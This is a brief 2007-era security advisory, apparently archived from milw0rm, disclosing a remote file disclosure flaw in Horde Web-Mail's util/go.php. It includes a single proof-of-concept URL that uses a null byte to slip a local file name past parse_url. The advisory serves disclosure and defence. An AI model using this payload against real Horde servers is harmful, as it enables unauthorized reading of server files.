----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ] Horde Web-Mail Remote File Disclosure Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . At first look , this code is not vulnerable and we can only read remote files. But parse_url is only a set of regular expressions and we can use nullbyte to deceive function. http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] 1st advisory: http://www.securityfocus.com/archive/1/427710/30/0/threaded # milw0rm.com [2008-01-06]